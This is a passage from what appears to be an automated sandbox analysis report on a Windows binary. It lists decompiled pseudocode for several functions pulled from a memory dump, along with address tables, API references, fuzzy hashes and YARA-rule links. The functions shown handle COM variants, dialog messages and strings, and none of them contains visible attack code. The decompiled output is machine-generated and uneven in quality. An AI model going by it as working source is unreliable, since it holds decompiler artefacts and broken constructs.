										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x1c) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x1c) & 0x00000000;
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x24) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x24) | 0xffffffff;
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x20) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x20) | 0xffffffff;
										_v12 = _v12 + 1;
										 *((intOrPtr*)(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x28)) = 1;
										 *((intOrPtr*)(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x2c)) =  *((intOrPtr*)( *_t122 + 0xa0));
										_t184 = _t184 + 0x30;
										__eflags = _v20;
									} while (_v20 != 0);
									_t146 = 0;
									__eflags = 0;
									L20:
									_v16 = _v16 + 1;
									_v8 = _v8 + 0x28;
									__eflags = _v16 -  *((intOrPtr*)(_t186 + 0x10));
								} while (_v16 <  *((intOrPtr*)(_t186 + 0x10)));
								goto L21;
							}
						}
						_t138 =  *((intOrPtr*)(_t186 + 0x14)) + 0x24;
						__eflags = _t138;
						do {
							_t177 =  *_t138;
							_t172 =  *(_t177 + 0xc);
							 *(_t186 + 0x38) =  *(_t186 + 0x38) +  *(_t177 + 0xc);
							_t149 = _t149 + 1;
							_t138 = _t138 + 0x28;
							__eflags = _t149 -  *((intOrPtr*)(_t186 + 0x10));
						} while (_t149 <  *((intOrPtr*)(_t186 + 0x10)));
						goto L12;
					}
					_t185 = 0;
					__eflags =  *(__ecx + 0x38);
					if( *(__ecx + 0x38) <= 0) {
						L8:
						 *(_t186 + 0x40) = _t146;
						goto L9;
					}
					_v12 = 0;
					do {
						__imp__#9( *(__ecx + 0x40) + _v12);
						_v12 = _v12 + 0x10;
						_t185 = _t185 + 1;
						__eflags = _t185 -  *(__ecx + 0x38);
					} while (_t185 <  *(__ecx + 0x38));
					__eflags =  *(__ecx + 0x38);
					if(__eflags > 0) {
						_push( *(__ecx + 0x40));
						E0040A3F2(0, __edx, _t185, __ecx, __eflags);
						_push( *((intOrPtr*)(_t186 + 0x3c)));
						E0040A3F2(0, __edx, _t185, _t186, __eflags);
					}
					goto L8;
				}
				E0041C7B6(__ecx);
				return  *((intOrPtr*)( *__ecx + 0x10))();
			}

0x0041d05c
0x0041d064
0x0041d066
0x0041d06b
0x0041d07e
0x0041d082
0x0041d0bf
0x0041d0bf
0x0041d0c1
0x0041d0c4
0x0041d0c7
0x0041d0e0
0x0041d0e0
0x0041d0e3
0x0041d0e5
0x0041d0eb
0x0041d0ec
0x0041d0f3
0x0041d0fc
0x0041d0fc
0x0041d0ff
0x0041d102
0x0041d105
0x0041d108
0x0041d1b2
0x0041d1b2
0x0041d1b5
0x0041d1c6
0x0041d1c9
0x0041d1cc
0x0041d1ce
0x0041d1d4
0x0041d1dc
0x0041d1e5
0x0041d1e5
0x0041d1e8
0x0041d1eb
0x0041d212
0x0041d214
0x00000000
0x0041d1ed
0x0041d1ed
0x0041d1ed
0x0041d1ef
0x0041d1f9
0x0041d201
0x0041d206
0x0041d209
0x0041d20a
0x0041d20d
0x0041d20d
0x00000000
0x0041d1ef
0x0041d10e
0x0041d10e
0x0041d111
0x0041d11b
0x0041d11e
0x0041d120
0x0041d123
0x00000000
0x00000000
0x0041d128
0x0041d128
0x0041d12b
0x0041d139
0x0041d14f
0x0041d15d
0x0041d164
0x0041d16c
0x0041d174
0x0041d17c
0x0041d17f
0x0041d190
0x0041d194
0x0041d197
0x0041d197
0x0041d19d
0x0041d19d
0x0041d19f
0x0041d19f
0x0041d1a5
0x0041d1a9
0x0041d1a9
0x00000000
0x0041d111
0x0041d108
0x0041d0cc
0x0041d0cc
0x0041d0cf
0x0041d0cf
0x0041d0d1
0x0041d0d4
0x0041d0d7
0x0041d0d8
0x0041d0db
0x0041d0db
0x00000000
0x0041d0cf
0x0041d084
0x0041d086
0x0041d089
0x0041d0bc
0x0041d0bc
0x00000000
0x0041d0bc
0x0041d08b
0x0041d08e
0x0041d095
0x0041d09b
0x0041d09f
0x0041d0a0
0x0041d0a0
0x0041d0a5
0x0041d0a8
0x0041d0aa
0x0041d0ad
0x0041d0b2
0x0041d0b5
0x0041d0bb
0x00000000
0x0041d0a8
0x0041d06d
0x00000000

APIs

VariantClear.OLEAUT32(?), ref: 0041D095

Strings

(, xrefs: 0041D1A5

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: ClearVariant
String ID: (
API String ID: 1473721057-3887548279
Opcode ID: dc37b98f940897cf275ca67733b89549944a49dc2f690b1e2bcf842b1703f5e1
Instruction ID: ca6c84eec94ce2e380042d160c004058904fac4b8a359609a93fa3fdb8b80d31
Opcode Fuzzy Hash: dc37b98f940897cf275ca67733b89549944a49dc2f690b1e2bcf842b1703f5e1
Instruction Fuzzy Hash: 69514971A00701AFC764DF69C981AAAB7F1FF48318B504A6EE59287B91C774F981CB48

Uniqueness

Uniqueness Score: -1.00%

Function 0041AD51, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0041AD51(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _v4;
				void* _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				char _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v56;
				char _v60;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				short _v84;
				signed int _v88;
				signed int _v92;
				short _v96;
				short _v100;
				signed int _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				signed int _v116;
				intOrPtr _v120;
				char _v124;
				signed int* _t78;
				signed int _t86;
				intOrPtr _t92;
				intOrPtr* _t109;
				intOrPtr* _t111;
				intOrPtr* _t113;
				signed int _t115;
				signed int _t123;
				signed int _t126;
				intOrPtr* _t148;
				void* _t150;

				_push(0x70);
				E004271DA(E0043AAFD, __ebx, __edi, __esi);
				_t150 = __ecx;
				_t78 =  *(__ecx + 0x50);
				_t123 = 0;
				_t126 = 0 | _t78 != 0x00000000;
				if(_t126 != 0) {
					_push( &_v16);
					_push(0x441ea4);
					_v16 = 0;
					_t126 =  *_t78;
					_push(_t78);
					_v20 = 0;
					if( *_t126() < 0) {
						L18:
						return E004272B2(_v20);
					} else {
						if((0 | _v16 != 0x00000000) == 0) {
							goto L3;
						} else {
							_v120 = __ecx + 0xc8;
							_v112 = __ecx + 0xd8;
							_v108 = __ecx + 0xdc;
							_v124 = 0x40;
							_v116 = 0;
							_v88 = 0;
							_v76 = 0;
							_v72 = 0;
							E00422542( &_v36);
							_t92 =  *((intOrPtr*)(__ecx + 0x20));
							_v4 = 0;
							if(_t92 == 0) {
								goto L3;
							} else {
								_t148 =  *((intOrPtr*)(_t92 + 0x20));
								_v104 = 0;
								if(_t148 == 0) {
									goto L3;
								} else {
									do {
										_t30 = _t123 + 0x43f360; // 0xfffffd3b
										 *((intOrPtr*)( *_t148 + 0x104))(_t150,  *_t30,  &_v36);
										if(_v28 != 0) {
											_t33 = _t123 + 0x43f364; // 0x4
											_v104 = _v104 |  *_t33;
										}
										_t123 = _t123 + 8;
									} while (_t123 < 0x40);
									 *((intOrPtr*)( *_t148 + 0x104))(_t150, 0xfffffd40,  &_v36);
									_v100 = _v28;
									 *((intOrPtr*)( *_t148 + 0x104))(_t150, 0xfffffd43,  &_v36);
									_v96 = _v28;
									 *((intOrPtr*)( *_t148 + 0x104))(_t150, 0xfffffd34,  &_v36);
									_v84 = _v28;
									 *((intOrPtr*)( *_t148 + 0x104))(_t150, 0xfffffd3f,  &_v36);
									_v80 = _v28;
									 *((intOrPtr*)( *_t148 + 0x104))(_t150, 0xfffffd41,  &_v36);
									_t109 = _v28;
									_push( &_v92);
									_push(0x441ef4);
									_push(_t109);
									if( *((intOrPtr*)( *_t109))() < 0) {
										_v92 = _v92 & 0x00000000;
									}
									_t111 = _v16;
									_push( &_v60);
									_push( &_v124);
									_v60 = 0x18;
									_push(_t111);
									if( *((intOrPtr*)( *_t111 + 0xc))() >= 0) {
										 *((intOrPtr*)(_t150 + 0x70)) = _v56;
										 *((intOrPtr*)(_t150 + 0x60)) = _v48;
										 *((intOrPtr*)(_t150 + 0x64)) = _v44;
										_v20 = 1;
									}
									_t113 = _v16;
									 *((intOrPtr*)( *_t113 + 8))(_t113);
									_t115 = _v92;
									if(_t115 != 0) {
										 *((intOrPtr*)( *_t115 + 8))(_t115);
									}
									__imp__#9( &_v36);
									goto L18;
								}
							}
						}
					}
				} else {
					L3:
					_push(_t126);
					_t4 =  &_v24; // 0x44e938
					_v24 = 0x44e9d0;
					E00429326(_t4, 0x448990);
					asm("int3");
					_t86 = _t126;
					 *((intOrPtr*)(_t86 + 4)) = 1;
					return _t86;
				}
			}

0x0041ad51
0x0041ad58
0x0041ad5d
0x0041ad5f
0x0041ad64
0x0041ad68
0x0041ad6d
0x0041ad77
0x0041ad78
0x0041ad7d
0x0041ad80
0x0041ad82
0x0041ad83
0x0041ad8a
0x0041aeff
0x0041af07
0x0041ad90
0x0041ad9a
0x00000000
0x0041ad9c
0x0041ada2
0x0041adab
0x0041adb4
0x0041adbb
0x0041adc2
0x0041adc5
0x0041adc8
0x0041adcb
0x0041adce
0x0041add3
0x0041add8
0x0041addb
0x00000000
0x0041addd
0x0041addd
0x0041ade2
0x0041ade5
0x00000000
0x0041ade7
0x0041ade7
0x0041aded
0x0041adf6
0x0041ae01
0x0041ae03
0x0041ae09
0x0041ae09
0x0041ae0c
0x0041ae0f
0x0041ae22
0x0041ae34
0x0041ae3c
0x0041ae4e
0x0041ae56
0x0041ae69
0x0041ae71
0x0041ae83
0x0041ae8b
0x0041ae91
0x0041ae99
0x0041ae9a
0x0041ae9f
0x0041aea4
0x0041aea6
0x0041aea6
0x0041aeaa
0x0041aeb0
0x0041aeb4
0x0041aeb5
0x0041aebe
0x0041aec4
0x0041aec9
0x0041aecf
0x0041aed5
0x0041aed8
0x0041aed8
0x0041aedf
0x0041aee5
0x0041aee8
0x0041aeed
0x0041aef2
0x0041aef2
0x0041aef9
0x00000000
0x0041aef9
0x0041ade5
0x0041addb
0x0041ad9a
0x0041ad6f
0x0041ad6f
0x0041583b
0x00415841
0x00415845
0x0041584c
0x00415851
0x00415852
0x00415854
0x0041585b
0x0041585b

APIs

__EH_prolog3.LIBCMT ref: 0041AD58

Strings

@, xrefs: 0041ADBB

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3
String ID: @
API String ID: 431132790-2766056989
Opcode ID: 2fac4ab0c378b0e0d966fbcd751ca674ea681492086c07b077397cad4b04b03e
Instruction ID: eb92c176639828ccfb454a0326971ede6c8f8d43daeed02953847f32bfd48aa2
Opcode Fuzzy Hash: 2fac4ab0c378b0e0d966fbcd751ca674ea681492086c07b077397cad4b04b03e
Instruction Fuzzy Hash: 1051E670A012199FDB14CFA8C984AEEB7F9BF48304F24456EE416EB250E774A985CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0041358D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
windowCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0041358D(void* __ebx, signed short __ecx, signed short* _a4) {
				signed int _v8;
				signed short _v12;
				signed short _v16;
				signed short _v20;
				signed short* _v48;
				void _v52;
				void* _v56;
				void* __ebp;
				signed short _t33;
				signed short _t34;
				intOrPtr _t48;
				signed int _t50;
				signed short _t55;
				signed short* _t58;
				signed short* _t60;
				signed short* _t62;
				long _t63;
				void* _t64;
				void* _t65;

				_t49 = __ecx;
				_t47 = __ebx;
				_t58 = _a4;
				_t55 = __ecx;
				_v12 = __ecx;
				_v8 = 1;
				if(_t58 == 0) {
					L18:
					E0041176E(_t47, _t49, _t54,  *(_t55 + 0x20), 0x364, 0, 0, 0, 0);
					L19:
					return _v8;
				}
				_push(__ebx);
				_t48 = __imp__SendDlgItemMessageA; // 0x774147e0
				while(1) {
					_t33 =  *_t58 & 0x0000ffff;
					if(_t33 == 0) {
						break;
					}
					_t60 =  &(_t58[1]);
					_t49 = _t33 & 0x0000ffff;
					_t34 =  *_t60 & 0x0000ffff;
					_t62 =  &(_t60[1]);
					_t54 =  *_t62;
					_t63 =  &(_t62[2]);
					_v16 = _t49;
					_v20 =  *_t62;
					if(_t34 == 0x1234) {
						L9:
						_t50 = 8;
						memset( &_v52, 0, _t50 << 2);
						_t65 = _t65 + 0xc;
						_v52 = _v52 | 0xffffffff;
						_v56 = 1;
						E00401EE0(_t48, _t64, _t63);
						_v48 = _a4;
						if(SendDlgItemMessageA( *(_v12 + 0x20), _v16 & 0x0000ffff, 0x401, 0,  &_v56) == 0xffffffff) {
							_v8 = _v8 & 0x00000000;
						}
						_t49 =  &(_a4[0xfffffffffffffff8]);
						E00401E60( &(_a4[0xfffffffffffffff8]), _t54);
						_t55 = _v12;
						L16:
						_t58 = _t63 + _v20;
						if(_v8 != 0) {
							continue;
						}
						break;
					}
					if(_t34 != 0x401) {
						if(_t34 == 0x403) {
							_t34 = 0x143;
						}
						if(_t34 != 0x401) {
							if(_t34 == 0x180 || _t34 == 0x143) {
								L14:
								if(SendDlgItemMessageA( *(_t55 + 0x20), _t49 & 0x0000ffff, _t34 & 0x0000ffff, 0, _t63) == 0xffffffff) {
									_v8 = _v8 & 0x00000000;
								}
							}
							goto L16;
						} else {
							goto L9;
						}
					}
					_t34 = 0x180;
					goto L14;
				}
				_pop(_t47);
				if(_v8 == 0) {
					goto L19;
				}
				goto L18;
			}

0x0041358d
0x0041358d
0x00413594
0x0041359a
0x0041359c
0x0041359f
0x004135a6
0x00413686
0x00413694
0x00413699
0x0041369f
0x0041369f
0x004135ac
0x004135ad
0x004135b3
0x004135b3
0x004135b9
0x00000000
0x00000000
0x004135c0
0x004135c1
0x004135c4
0x004135c8
0x004135c9
0x004135cb
0x004135d2
0x004135d5
0x004135d8
0x004135f8
0x004135fa
0x00413600
0x00413600
0x00413602
0x0041360a
0x00413611
0x00413619
0x00413637
0x00413639
0x00413639
0x00413640
0x00413643
0x00413648
0x00413672
0x00413672
0x00413679
0x00000000
0x00000000
0x00000000
0x00413679
0x004135de
0x004135eb
0x004135ed
0x004135ed
0x004135f6
0x00413651
0x00413659
0x0041366c
0x0041366e
0x0041366e
0x0041366c
0x00000000
0x00000000
0x00000000
0x00000000
0x004135f6
0x004135e0
0x00000000
0x004135e0
0x00413683
0x00413684
0x00000000
0x00000000
0x00000000

APIs

SendDlgItemMessageA.USER32(?,?,00000401,00000000,00000001), ref: 00413632
SendDlgItemMessageA.USER32(?,?,?,00000000,?), ref: 00413667

Strings

GAw, xrefs: 004135AD

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemMessageSend
String ID: GAw
API String ID: 3015471070-2039021800
Opcode ID: 2861639ca7f8e0368459d35f1ed22b7922ab70711588d94c5cd5cbf29ecb98ae
Instruction ID: fe52b6aa2a3dac104b3185280c56478472f621a5e0287daddbe630918052ee70
Opcode Fuzzy Hash: 2861639ca7f8e0368459d35f1ed22b7922ab70711588d94c5cd5cbf29ecb98ae
Instruction Fuzzy Hash: F5318075900224BBDF209E58C840BFE77B9EB14325F504266F991A73D0C7789F82DB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041D2AD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 24%

			E0041D2AD(intOrPtr __ebx, signed int __edx, intOrPtr* _a4, char _a8, void* _a12, signed int _a16) {
				signed int _v8;
				char _v24;
				signed int _v28;
				char _v32;
				void* _v36;
				intOrPtr _v40;
				signed int _v44;
				void* _v48;
				char _v52;
				void* __edi;
				void* __esi;
				signed int _t36;
				intOrPtr* _t38;
				intOrPtr _t39;
				intOrPtr _t41;
				intOrPtr* _t43;
				signed int _t45;
				intOrPtr _t46;
				intOrPtr* _t47;
				signed int _t51;
				signed int _t57;
				intOrPtr _t58;
				signed int _t59;
				char _t67;
				signed int _t68;

				_t61 = __edx;
				_t50 = __ebx;
				_t36 =  *0x44f5d0; // 0x765b253d
				_v8 = _t36 ^ _t68;
				_t38 = _a4;
				_t67 = _a8;
				_t66 = _a12;
				_v48 = _t66;
				if(_t38 != 0) {
					if(_t66 == 0) {
						goto L1;
					}
					_v44 = _v44 & 0x00000000;
					_t61 =  &_v44;
					_t41 =  *((intOrPtr*)( *_t38))(_t38, 0x43f3dc,  &_v44, __ebx);
					_t51 = _a16;
					_v40 = _t41;
					if(_t51 > 0) {
						_t59 = _t51;
						memset(_t66, 0, _t59 << 2);
						_t66 = _t66 + _t59;
					}
					if(_v40 < 0) {
						L15:
						_t43 = _v44;
						_pop(_t50);
						if(_t43 != 0) {
							 *((intOrPtr*)( *_t43 + 8))(_t43);
						}
						_t39 = _v40;
						L18:
						return E0042569C(_t39, _t50, _v8 ^ _t68, _t61, _t66, _t67);
					} else {
						_v32 = _t67;
						_v28 = _t51;
						_t67 = 0x442568;
						_t66 =  &_v24;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t61 =  &_v32;
						_v52 = 0;
						_v36 = 0;
						_t45 = _v44;
						asm("movsd");
						_t46 =  *((intOrPtr*)( *_t45 + 0xc))(_t45, 1,  &_v32,  &_v52,  &_v36);
						_v40 = _t46;
						_t47 = _v36;
						if(_t46 < 0) {
							L14:
							__imp__CoTaskMemFree(_t47);
							goto L15;
						}
						_t57 = 0;
						_t67 = 0;
						while(1) {
							_t61 =  *(_t47 + 4);
							if(_t61 >= _t51) {
								_t61 = _t51;
							}
							if(_t57 >= _t61) {
								break;
							}
							_t66 = _v48;
							 *((intOrPtr*)(_v48 + _t57 * 4)) =  *((short*)( *_t47 + _t67 + 0x2c));
							_t57 = _t57 + 1;
							_t67 = _t67 + 0x34;
						}
						_t58 =  *_t47;
						if(_t58 != 0) {
							__imp__CoTaskMemFree(_t58);
							_t47 = _v36;
						}
						goto L14;
					}
				}
				L1:
				_t39 = 0x80004005;
				goto L18;
			}

0x0041d2ad
0x0041d2ad
0x0041d2b3
0x0041d2ba
0x0041d2bd
0x0041d2c3
0x0041d2c7
0x0041d2ca
0x0041d2cd
0x0041d2db
0x00000000
0x00000000
0x0041d2df
0x0041d2e4
0x0041d2ee
0x0041d2f0
0x0041d2f5
0x0041d2f8
0x0041d2fa
0x0041d2fe
0x0041d2fe
0x0041d2fe
0x0041d305
0x0041d37b
0x0041d37b
0x0041d380
0x0041d381
0x0041d386
0x0041d386
0x0041d389
0x0041d38c
0x0041d399
0x0041d307
0x0041d307
0x0041d30a
0x0041d30d
0x0041d312
0x0041d315
0x0041d316
0x0041d31f
0x0041d320
0x0041d324
0x0041d327
0x0041d32a
0x0041d32f
0x0041d333
0x0041d336
0x0041d33b
0x0041d33e
0x0041d374
0x0041d375
0x00000000
0x0041d375
0x0041d340
0x0041d342
0x0041d344
0x0041d344
0x0041d349
0x0041d34b
0x0041d34b
0x0041d34f
0x00000000
0x00000000
0x0041d358
0x0041d35b
0x0041d35e
0x0041d35f
0x0041d35f
0x0041d364
0x0041d368
0x0041d36b
0x0041d371
0x0041d371
0x00000000
0x0041d368
0x0041d305
0x0041d2cf
0x0041d2cf
0x00000000

APIs

CoTaskMemFree.OLE32(00000000), ref: 0041D36B
CoTaskMemFree.OLE32(?), ref: 0041D375

Strings

h%D, xrefs: 0041D30D

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeTask
String ID: h%D
API String ID: 734271698-549918436
Opcode ID: 80a06b78ca4ceb4e93cb586a1ec7612c3d8feb84411cb74e6504a56ef66e7d8b
Instruction ID: 1090c3e2d0adbeed171144900c2e44012caec48972a6250360b978ace9dbfbe8
Opcode Fuzzy Hash: 80a06b78ca4ceb4e93cb586a1ec7612c3d8feb84411cb74e6504a56ef66e7d8b
Instruction Fuzzy Hash: DC3150B5E006089FCB00CFA8D8849EEB7F5BF89700B14846AE816FB210D779E941CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00404F70, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404F70(intOrPtr __ecx, char _a4, intOrPtr _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t14;
				intOrPtr _t15;
				intOrPtr* _t17;
				intOrPtr* _t22;
				intOrPtr* _t25;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t39;

				_t38 = __ecx;
				_t27 =  *((intOrPtr*)(__ecx + 0x18));
				_t25 = __ecx + 4;
				if(_t27 < 0x10) {
					_t14 = _t25;
				} else {
					_t14 =  *_t25;
				}
				_t3 =  &_a4; // 0x765b253d
				_t39 =  *_t3;
				if(_t39 < _t14) {
					L11:
					_t35 = _a8;
					__eflags = _t35 - 0xfffffffe;
					if(__eflags > 0) {
						E00439257(_t25, _t35, _t38, __eflags);
					}
					_t15 =  *((intOrPtr*)(_t38 + 0x18));
					__eflags = _t15 - _t35;
					if(_t15 >= _t35) {
						__eflags = _t35;
						if(__eflags != 0) {
							goto L15;
						} else {
							__eflags = _t15 - 0x10;
							 *((intOrPtr*)(_t38 + 0x14)) = _t35;
							if(_t15 >= 0x10) {
								_t25 =  *_t25;
							}
							 *_t25 = 0;
							return _t38;
						}
					} else {
						E00404BE0(_t38, _t32, _t35,  *((intOrPtr*)(_t38 + 0x14)));
						__eflags = _t35;
						L15:
						if(__eflags > 0) {
							_t28 =  *((intOrPtr*)(_t38 + 0x18));
							__eflags = _t28 - 0x10;
							if(_t28 < 0x10) {
								_t17 = _t25;
							} else {
								_t17 =  *_t25;
							}
							E00425DFA(_t25, _t28, _t17, _t28, _t39, _t35);
							__eflags =  *((intOrPtr*)(_t38 + 0x18)) - 0x10;
							 *((intOrPtr*)(_t38 + 0x14)) = _t35;
							if( *((intOrPtr*)(_t38 + 0x18)) >= 0x10) {
								_t25 =  *_t25;
							}
							 *((char*)(_t25 + _t35)) = 0;
						}
						return _t38;
					}
				} else {
					if(_t27 < 0x10) {
						_t22 = _t25;
					} else {
						_t22 =  *_t25;
					}
					_t32 =  *((intOrPtr*)(_t38 + 0x14)) + _t22;
					if( *((intOrPtr*)(_t38 + 0x14)) + _t22 <= _t39) {
						goto L11;
					} else {
						if(_t27 >= 0x10) {
							_t25 =  *_t25;
						}
						return E00404150(_t38, _t38, _t39 - _t25, _a8);
					}
				}
			}

0x00404f73
0x00404f75
0x00404f7b
0x00404f7e
0x00404f84
0x00404f80
0x00404f80
0x00404f80
0x00404f86
0x00404f86
0x00404f8c
0x00404fbf
0x00404fc0
0x00404fc4
0x00404fc7
0x00404fc9
0x00404fc9
0x00404fce
0x00404fd1
0x00404fd3
0x00404ff1
0x00404ff3
0x00000000
0x00404ff5
0x00404ff5
0x00404ff8
0x00404ffb
0x00404ffd
0x00404ffd
0x00405004
0x00405008
0x00405008
0x00404fd5
0x00404fdc
0x00404fe1
0x00404fe3
0x00404fe3
0x00404fe5
0x00404fe8
0x00404feb
0x0040500b
0x00404fed
0x00404fed
0x00404fed
0x00405011
0x00405019
0x0040501d
0x00405020
0x00405022
0x00405022
0x00405024
0x00405024
0x0040502e
0x0040502e
0x00404f8e
0x00404f91
0x00404f97
0x00404f93
0x00404f93
0x00404f93
0x00404f9c
0x00404fa0
0x00000000
0x00404fa2
0x00404fa5
0x00404fa7
0x00404fa7
0x00404fbc
0x00404fbc
0x00404fa0

APIs

std::_String_base::_Xlen.LIBCPMT ref: 00404FC9

Part of subcall function 00439257: __EH_prolog3.LIBCMT ref: 0043925E
Part of subcall function 00439257: __CxxThrowException@8.LIBCMT ref: 00439290

_memcpy_s.LIBCMT ref: 00405011

Strings

=%[v, xrefs: 00404F86, 00404FB0, 0040500E

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8H_prolog3String_base::_ThrowXlen_memcpy_sstd::_
String ID: =%[v
API String ID: 2449198026-4255788029
Opcode ID: 2783401f8a9eccdcb3180bc69e053451d19b16fcd0430d6989a54bd1bc048e69
Instruction ID: 53156058b5564e08669de91ecad472ef116557fd039d0bd3cded66df84b49853
Opcode Fuzzy Hash: 2783401f8a9eccdcb3180bc69e053451d19b16fcd0430d6989a54bd1bc048e69
Instruction Fuzzy Hash: 3021B571300A118BDB24EA4DE5C092BB3AADFD6355B50093FF2429BBC1D775AC4487BA

Uniqueness

Uniqueness Score: -1.00%

Function 00433F4D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00433F4D() {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t10;
				void* _t12;
				intOrPtr _t15;
				intOrPtr* _t16;
				signed int _t19;
				signed int _t20;
				intOrPtr _t26;
				intOrPtr _t27;

				_t5 =  *0x4547e0;
				_t26 = 0x14;
				if(_t5 != 0) {
					if(_t5 < _t26) {
						_t5 = _t26;
						goto L4;
					}
				} else {
					_t5 = 0x200;
					L4:
					 *0x4547e0 = _t5;
				}
				_t6 = E0042AD31(_t5, 4);
				 *0x4537d4 = _t6;
				if(_t6 != 0) {
					L8:
					_t19 = 0;
					_t15 = 0x450050;
					while(1) {
						 *((intOrPtr*)(_t19 + _t6)) = _t15;
						_t15 = _t15 + 0x20;
						_t19 = _t19 + 4;
						if(_t15 >= 0x4502d0) {
							break;
						}
						_t6 =  *0x4537d4; // 0x23a1e78
					}
					_t27 = 0xfffffffe;
					_t20 = 0;
					_t16 = 0x450060;
					do {
						_t10 =  *((intOrPtr*)((_t20 & 0x0000001f) * 0x28 +  *((intOrPtr*)(0x454800 + (_t20 >> 5) * 4))));
						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
							 *_t16 = _t27;
						}
						_t16 = _t16 + 0x20;
						_t20 = _t20 + 1;
					} while (_t16 < 0x4500c0);
					return 0;
				} else {
					 *0x4547e0 = _t26;
					_t6 = E0042AD31(_t26, 4);
					 *0x4537d4 = _t6;
					if(_t6 != 0) {
						goto L8;
					} else {
						_t12 = 0x1a;
						return _t12;
					}
				}
			}

0x00433f4d
0x00433f57
0x00433f58
0x00433f63
0x00433f65
0x00000000
0x00433f65
0x00433f5a
0x00433f5a
0x00433f67
0x00433f67
0x00433f67
0x00433f6f
0x00433f78
0x00433f7d
0x00433f9d
0x00433f9d
0x00433f9f
0x00433fab
0x00433fab
0x00433fae
0x00433fb1
0x00433fba
0x00000000
0x00000000
0x00433fa6
